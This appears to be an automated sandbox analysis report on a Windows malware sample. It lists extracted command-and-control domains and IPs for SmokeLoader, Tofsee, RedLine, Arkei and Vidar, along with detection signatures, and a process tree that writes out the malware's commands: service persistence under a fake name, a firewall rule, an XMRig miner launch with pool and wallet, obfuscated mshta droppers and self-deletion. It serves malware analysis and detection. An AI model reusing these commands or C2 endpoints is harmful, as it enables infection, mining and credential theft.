Analysis

  • max time kernel
    116s
  • max time network
    152s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    29/11/2021, 14:46

General

  • Target

    d256a86197b9d77ec7a825ce001acbb8cb6c66aaf16ba480dfdcaebf99d32804.exe

  • Size

    334KB

  • MD5

    9cb319b64a1e7bdb734950ce19bb92a9

  • SHA1

    76d8076b029f582841a15690c548122de898443d

  • SHA256

    d256a86197b9d77ec7a825ce001acbb8cb6c66aaf16ba480dfdcaebf99d32804

  • SHA512

    46e1c560ce1c9f60cfc262f14a700efcb453409747e181a8f1ee601c500aa245b184c6afd33613cd7366c90dc03a096205d594c0ef1bff3546ed97d45ec4df9f

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://host-data-coin-11.com/

http://file-coin-host-12.com/

http://srtuiyhuali.at/

http://fufuiloirtu.com/

http://amogohuigotuli.at/

http://novohudosovu.com/

http://brutuilionust.com/

http://bubushkalioua.com/

http://dumuilistrati.at/

http://verboliatsiaeeees.com/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

tofsee

C2

quadoil.ru

lakeflex.ru

Extracted

Family

redline

C2

185.189.167.130:38637

Extracted

Family

arkei

Botnet

Default

C2

http://file-file-host4.com/tratata.php

Extracted

Family

redline

Botnet

bbtt1

C2

212.193.30.196:13040

Extracted

Family

vidar

Version

48.7

Botnet

706

C2

https://mstdn.social/@anapa

https://mastodon.social/@mniami

Attributes
  • profile_id

    706

Signatures

  • Arkei

    Arkei is an infostealer written in C++.

  • Bazar Loader

    Detected loader normally used to deploy BazarBackdoor malware.

  • CryptBot

    A C++ stealer distributed widely in bundle with other software.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 5 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

    suricata: ET MALWARE Sharik/Smoke CnC Beacon 11

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

    suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Arkei Stealer Payload 1 IoCs
  • Bazar/Team9 Loader payload 1 IoCs
  • Vidar Stealer 2 IoCs
  • XMRig Miner Payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Executes dropped EXE 11 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets service image path in registry 2 TTPs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 9 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 12 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d256a86197b9d77ec7a825ce001acbb8cb6c66aaf16ba480dfdcaebf99d32804.exe
    "C:\Users\Admin\AppData\Local\Temp\d256a86197b9d77ec7a825ce001acbb8cb6c66aaf16ba480dfdcaebf99d32804.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3288
    • C:\Users\Admin\AppData\Local\Temp\d256a86197b9d77ec7a825ce001acbb8cb6c66aaf16ba480dfdcaebf99d32804.exe
      "C:\Users\Admin\AppData\Local\Temp\d256a86197b9d77ec7a825ce001acbb8cb6c66aaf16ba480dfdcaebf99d32804.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:2592
  • C:\Users\Admin\AppData\Local\Temp\86FE.exe
    C:\Users\Admin\AppData\Local\Temp\86FE.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:408
    • C:\Users\Admin\AppData\Local\Temp\86FE.exe
      C:\Users\Admin\AppData\Local\Temp\86FE.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:440
  • C:\Users\Admin\AppData\Local\Temp\9C9B.exe
    C:\Users\Admin\AppData\Local\Temp\9C9B.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:3696
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\jjuqingy\
      2⤵
        PID:1316
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\qziqewen.exe" C:\Windows\SysWOW64\jjuqingy\
        2⤵
          PID:3364
        • C:\Windows\SysWOW64\sc.exe
          "C:\Windows\System32\sc.exe" create jjuqingy binPath= "C:\Windows\SysWOW64\jjuqingy\qziqewen.exe /d\"C:\Users\Admin\AppData\Local\Temp\9C9B.exe\"" type= own start= auto DisplayName= "wifi support"
          2⤵
            PID:3928
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\System32\sc.exe" description jjuqingy "wifi internet conection"
            2⤵
              PID:700
            • C:\Windows\SysWOW64\sc.exe
              "C:\Windows\System32\sc.exe" start jjuqingy
              2⤵
                PID:3792
              • C:\Windows\SysWOW64\netsh.exe
                "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                2⤵
                  PID:2244
              • C:\Users\Admin\AppData\Local\Temp\B1CA.exe
                C:\Users\Admin\AppData\Local\Temp\B1CA.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:3336
                • C:\Users\Admin\AppData\Local\Temp\B1CA.exe
                  C:\Users\Admin\AppData\Local\Temp\B1CA.exe
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1432
              • C:\Windows\SysWOW64\jjuqingy\qziqewen.exe
                C:\Windows\SysWOW64\jjuqingy\qziqewen.exe /d"C:\Users\Admin\AppData\Local\Temp\9C9B.exe"
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1312
                • C:\Windows\SysWOW64\svchost.exe
                  svchost.exe
                  2⤵
                  • Drops file in System32 directory
                  • Suspicious use of SetThreadContext
                  • Modifies data under HKEY_USERS
                  • Suspicious use of WriteProcessMemory
                  PID:2304
                  • C:\Windows\SysWOW64\svchost.exe
                    svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                    3⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3992
              • C:\Users\Admin\AppData\Local\Temp\2F96.exe
                C:\Users\Admin\AppData\Local\Temp\2F96.exe
                1⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:2840
              • C:\Users\Admin\AppData\Local\Temp\5DAC.exe
                C:\Users\Admin\AppData\Local\Temp\5DAC.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:2016
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\5DAC.exe" & exit
                  2⤵
                    PID:3812
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 5
                      3⤵
                      • Delays execution with timeout.exe
                      PID:1708
                • C:\Windows\system32\regsvr32.exe
                  regsvr32 /s C:\Users\Admin\AppData\Local\Temp\9E7E.dll
                  1⤵
                  • Loads dropped DLL
                  PID:3928
                • C:\Users\Admin\AppData\Local\Temp\A11F.exe
                  C:\Users\Admin\AppData\Local\Temp\A11F.exe
                  1⤵
                  • Executes dropped EXE
                  PID:1644
                  • C:\Windows\SysWOW64\mshta.exe
                    "C:\Windows\System32\mshta.exe" VBSCrIPT: ClOSE ( CREaTEOBjeCt ( "wscRipT.shell" ). RUN ( "C:\Windows\system32\cmd.exe /q /R coPY /Y ""C:\Users\Admin\AppData\Local\Temp\A11F.exe"" ..\5b1_g~qYDZdSZ8W.eXe && StaRT ..\5b1_g~qYdZdSZ8W.eXE -PVQQIyT0eqsTq & If """" == """" for %o iN ( ""C:\Users\Admin\AppData\Local\Temp\A11F.exe"" ) do taskkill -F -IM ""%~Nxo"" " , 0 , True ) )
                    2⤵
                      PID:3148
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /q /R coPY /Y "C:\Users\Admin\AppData\Local\Temp\A11F.exe" ..\5b1_g~qYDZdSZ8W.eXe && StaRT ..\5b1_g~qYdZdSZ8W.eXE -PVQQIyT0eqsTq & If "" == "" for %o iN ( "C:\Users\Admin\AppData\Local\Temp\A11F.exe" ) do taskkill -F -IM "%~Nxo"
                        3⤵
                          PID:524
                          • C:\Users\Admin\AppData\Local\Temp\5b1_g~qYDZdSZ8W.eXe
                            ..\5b1_g~qYdZdSZ8W.eXE -PVQQIyT0eqsTq
                            4⤵
                            • Executes dropped EXE
                            PID:2244
                            • C:\Windows\SysWOW64\mshta.exe
                              "C:\Windows\System32\mshta.exe" VBSCrIPT: ClOSE ( CREaTEOBjeCt ( "wscRipT.shell" ). RUN ( "C:\Windows\system32\cmd.exe /q /R coPY /Y ""C:\Users\Admin\AppData\Local\Temp\5b1_g~qYDZdSZ8W.eXe"" ..\5b1_g~qYDZdSZ8W.eXe && StaRT ..\5b1_g~qYdZdSZ8W.eXE -PVQQIyT0eqsTq & If ""-PVQQIyT0eqsTq "" == """" for %o iN ( ""C:\Users\Admin\AppData\Local\Temp\5b1_g~qYDZdSZ8W.eXe"" ) do taskkill -F -IM ""%~Nxo"" " , 0 , True ) )
                              5⤵
                                PID:1224
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /q /R coPY /Y "C:\Users\Admin\AppData\Local\Temp\5b1_g~qYDZdSZ8W.eXe" ..\5b1_g~qYDZdSZ8W.eXe && StaRT ..\5b1_g~qYdZdSZ8W.eXE -PVQQIyT0eqsTq & If "-PVQQIyT0eqsTq " == "" for %o iN ( "C:\Users\Admin\AppData\Local\Temp\5b1_g~qYDZdSZ8W.eXe" ) do taskkill -F -IM "%~Nxo"
                                  6⤵
                                    PID:1148
                                • C:\Windows\SysWOW64\mshta.exe
                                  "C:\Windows\System32\mshta.exe" VBscriPT: CLOse( crEatEobJect ( "WSCRIPT.sHEll" ). run ( "C:\Windows\system32\cmd.exe /C echO | Set /p = ""MZ"" > Y9P8GeW.SYt& coPy /y /b Y9P8GeW.Syt+ iDTWeX.KR + 6VXIK.D + WNYGk.9UB ..\6KSsiU1.MB & del /Q *& STaRt odbcconf /a { REgsvr ..\6ksSIU1.MB } " , 0 , tRuE ) )
                                  5⤵
                                    PID:1876
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /C echO | Set /p = "MZ" > Y9P8GeW.SYt& coPy /y /b Y9P8GeW.Syt+ iDTWeX.KR + 6VXIK.D + WNYGk.9UB ..\6KSsiU1.MB & del /Q *& STaRt odbcconf /a { REgsvr ..\6ksSIU1.MB }
                                      6⤵
                                        PID:2292
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /S /D /c" echO "
                                          7⤵
                                            PID:3176
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>Y9P8GeW.SYt"
                                            7⤵
                                              PID:2036
                                            • C:\Windows\SysWOW64\odbcconf.exe
                                              odbcconf /a { REgsvr ..\6ksSIU1.MB }
                                              7⤵
                                                PID:2840
                                        • C:\Windows\SysWOW64\taskkill.exe
                                          taskkill -F -IM "A11F.exe"
                                          4⤵
                                          • Kills process with taskkill
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1028
                                  • C:\Users\Admin\AppData\Local\Temp\AC1D.exe
                                    C:\Users\Admin\AppData\Local\Temp\AC1D.exe
                                    1⤵
                                    • Executes dropped EXE
                                    PID:2252
                                  • C:\Users\Admin\AppData\Local\Temp\DFE0.exe
                                    C:\Users\Admin\AppData\Local\Temp\DFE0.exe
                                    1⤵
                                      PID:3932
                                    • C:\Users\Admin\AppData\Local\Temp\EDCB.exe
                                      C:\Users\Admin\AppData\Local\Temp\EDCB.exe
                                      1⤵
                                        PID:1784
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c taskkill /im EDCB.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\EDCB.exe" & del C:\ProgramData\*.dll & exit
                                          2⤵
                                            PID:592
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /im EDCB.exe /f
                                              3⤵
                                              • Kills process with taskkill
                                              PID:3336
                                            • C:\Windows\SysWOW64\timeout.exe
                                              timeout /t 6
                                              3⤵
                                              • Delays execution with timeout.exe
                                              PID:2364
                                        • C:\Windows\SysWOW64\explorer.exe
                                          C:\Windows\SysWOW64\explorer.exe
                                          1⤵
                                            PID:3792
                                          • C:\Windows\explorer.exe
                                            C:\Windows\explorer.exe
                                            1⤵
                                              PID:2280
                                            • C:\Users\Admin\AppData\Local\Temp\3516.exe
                                              C:\Users\Admin\AppData\Local\Temp\3516.exe
                                              1⤵
                                                PID:3592
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\system32\cmd.exe" /c rd /s /q C:\Users\Admin\AppData\Local\Temp\lnmZgwRf & timeout 4 & del /f /q "C:\Users\Admin\AppData\Local\Temp\3516.exe"
                                                  2⤵
                                                    PID:3704
                                                    • C:\Windows\SysWOW64\timeout.exe
                                                      timeout 4
                                                      3⤵
                                                      • Delays execution with timeout.exe
                                                      PID:3952
                                                • C:\Windows\System32\rundll32.exe
                                                  C:\Windows\System32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\9E7E.dll,DllRegisterServer {405962E5-0895-406A-9380-B20461666707}
                                                  1⤵
                                                    PID:1320

                                                  Network

                                                        MITRE ATT&CK Enterprise v6

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • memory/408-123-0x0000000003603000-0x0000000003613000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/1312-151-0x00000000034F1000-0x0000000003501000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/1312-164-0x0000000000400000-0x000000000322A000-memory.dmp

                                                          Filesize

                                                          46.2MB

                                                        • memory/1312-163-0x0000000003370000-0x00000000034BA000-memory.dmp

                                                          Filesize

                                                          1.3MB

                                                        • memory/1432-156-0x0000000000400000-0x0000000000420000-memory.dmp

                                                          Filesize

                                                          128KB

                                                        • memory/1432-162-0x0000000005180000-0x0000000005181000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/1432-169-0x0000000004C90000-0x0000000004C91000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/1432-181-0x0000000006760000-0x0000000006761000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/1432-179-0x0000000005BA0000-0x0000000005BA1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/1432-182-0x0000000006E60000-0x0000000006E61000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/1432-168-0x0000000004C50000-0x0000000004C51000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/1432-165-0x0000000004BF0000-0x0000000004BF1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/1432-166-0x0000000004D20000-0x0000000004D21000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/1432-177-0x0000000004FC0000-0x0000000004FC1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/1432-167-0x0000000004B70000-0x0000000005176000-memory.dmp

                                                          Filesize

                                                          6.0MB

                                                        • memory/1784-267-0x0000000003640000-0x0000000003715000-memory.dmp

                                                          Filesize

                                                          852KB

                                                        • memory/1784-268-0x0000000000400000-0x000000000329A000-memory.dmp

                                                          Filesize

                                                          46.6MB

                                                        • memory/1784-266-0x00000000033B3000-0x000000000342F000-memory.dmp

                                                          Filesize

                                                          496KB

                                                        • memory/2016-194-0x0000000003240000-0x000000000338A000-memory.dmp

                                                          Filesize

                                                          1.3MB

                                                        • memory/2016-195-0x0000000000400000-0x0000000003232000-memory.dmp

                                                          Filesize

                                                          46.2MB

                                                        • memory/2016-193-0x00000000035D3000-0x00000000035E7000-memory.dmp

                                                          Filesize

                                                          80KB

                                                        • memory/2252-222-0x0000000000400000-0x0000000003245000-memory.dmp

                                                          Filesize

                                                          46.3MB

                                                        • memory/2252-223-0x0000000007952000-0x0000000007953000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2252-232-0x0000000007954000-0x0000000007956000-memory.dmp

                                                          Filesize

                                                          8KB

                                                        • memory/2252-230-0x0000000007F70000-0x0000000007F71000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2252-224-0x0000000007953000-0x0000000007954000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2252-221-0x00000000077B0000-0x00000000077DC000-memory.dmp

                                                          Filesize

                                                          176KB

                                                        • memory/2252-217-0x0000000004E70000-0x0000000004EA9000-memory.dmp

                                                          Filesize

                                                          228KB

                                                        • memory/2252-219-0x0000000007950000-0x0000000007951000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2252-216-0x00000000033A6000-0x00000000033D2000-memory.dmp

                                                          Filesize

                                                          176KB

                                                        • memory/2252-218-0x00000000050C0000-0x00000000050EE000-memory.dmp

                                                          Filesize

                                                          184KB

                                                        • memory/2280-263-0x00000000004C0000-0x00000000004CC000-memory.dmp

                                                          Filesize

                                                          48KB

                                                        • memory/2280-262-0x00000000004D0000-0x00000000004D7000-memory.dmp

                                                          Filesize

                                                          28KB

                                                        • memory/2304-155-0x00000000007D0000-0x00000000007D1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2304-154-0x00000000007D0000-0x00000000007D1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2304-152-0x00000000028D0000-0x00000000028E5000-memory.dmp

                                                          Filesize

                                                          84KB

                                                        • memory/2592-116-0x0000000000400000-0x0000000000409000-memory.dmp

                                                          Filesize

                                                          36KB

                                                        • memory/2840-187-0x0000000002010000-0x0000000002019000-memory.dmp

                                                          Filesize

                                                          36KB

                                                        • memory/2840-245-0x0000000004DE0000-0x0000000004E96000-memory.dmp

                                                          Filesize

                                                          728KB

                                                        • memory/2840-188-0x0000000000400000-0x000000000042C000-memory.dmp

                                                          Filesize

                                                          176KB

                                                        • memory/2840-186-0x0000000000480000-0x0000000000489000-memory.dmp

                                                          Filesize

                                                          36KB

                                                        • memory/2840-240-0x0000000000810000-0x000000000095A000-memory.dmp

                                                          Filesize

                                                          1.3MB

                                                        • memory/2840-272-0x0000000004670000-0x000000000470C000-memory.dmp

                                                          Filesize

                                                          624KB

                                                        • memory/2840-270-0x0000000004EA0000-0x0000000004F50000-memory.dmp

                                                          Filesize

                                                          704KB

                                                        • memory/2840-244-0x0000000004C20000-0x0000000004D19000-memory.dmp

                                                          Filesize

                                                          996KB

                                                        • memory/2840-271-0x0000000004670000-0x000000000470C000-memory.dmp

                                                          Filesize

                                                          624KB

                                                        • memory/3024-189-0x00000000029F0000-0x0000000002A06000-memory.dmp

                                                          Filesize

                                                          88KB

                                                        • memory/3024-130-0x00000000023D0000-0x00000000023E6000-memory.dmp

                                                          Filesize

                                                          88KB

                                                        • memory/3024-119-0x00000000007A0000-0x00000000007B6000-memory.dmp

                                                          Filesize

                                                          88KB

                                                        • memory/3288-118-0x0000000000030000-0x0000000000039000-memory.dmp

                                                          Filesize

                                                          36KB

                                                        • memory/3336-149-0x00000000052E0000-0x00000000052E1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/3336-137-0x00000000008A0000-0x00000000008A1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/3336-142-0x00000000050C0000-0x00000000050C1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/3336-146-0x0000000005070000-0x0000000005071000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/3336-150-0x00000000057F0000-0x00000000057F1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/3592-287-0x0000000077580000-0x000000007770E000-memory.dmp

                                                          Filesize

                                                          1.6MB

                                                        • memory/3592-283-0x0000000000270000-0x0000000000952000-memory.dmp

                                                          Filesize

                                                          6.9MB

                                                        • memory/3592-284-0x0000000000270000-0x0000000000952000-memory.dmp

                                                          Filesize

                                                          6.9MB

                                                        • memory/3592-285-0x0000000000270000-0x0000000000952000-memory.dmp

                                                          Filesize

                                                          6.9MB

                                                        • memory/3592-286-0x0000000000270000-0x0000000000952000-memory.dmp

                                                          Filesize

                                                          6.9MB

                                                        • memory/3696-133-0x0000000000400000-0x000000000322A000-memory.dmp

                                                          Filesize

                                                          46.2MB

                                                        • memory/3696-132-0x0000000003280000-0x0000000003293000-memory.dmp

                                                          Filesize

                                                          76KB

                                                        • memory/3696-131-0x0000000003436000-0x0000000003447000-memory.dmp

                                                          Filesize

                                                          68KB

                                                        • memory/3792-260-0x0000000000800000-0x000000000086B000-memory.dmp

                                                          Filesize

                                                          428KB

                                                        • memory/3792-259-0x0000000000870000-0x00000000008E4000-memory.dmp

                                                          Filesize

                                                          464KB

                                                        • memory/3928-276-0x00000000028E0000-0x000000000290A000-memory.dmp

                                                          Filesize

                                                          168KB

                                                        • memory/3932-250-0x0000000000FE0000-0x0000000001722000-memory.dmp

                                                          Filesize

                                                          7.3MB

                                                        • memory/3932-251-0x0000000000FE0000-0x0000000001722000-memory.dmp

                                                          Filesize

                                                          7.3MB

                                                        • memory/3932-248-0x0000000000FE0000-0x0000000001722000-memory.dmp

                                                          Filesize

                                                          7.3MB

                                                        • memory/3932-247-0x0000000000FE0000-0x0000000001722000-memory.dmp

                                                          Filesize

                                                          7.3MB

                                                        • memory/3932-246-0x0000000077580000-0x000000007770E000-memory.dmp

                                                          Filesize

                                                          1.6MB

                                                        • memory/3992-175-0x0000000003000000-0x00000000030F1000-memory.dmp

                                                          Filesize

                                                          964KB

                                                        • memory/3992-170-0x0000000003000000-0x00000000030F1000-memory.dmp

                                                          Filesize

                                                          964KB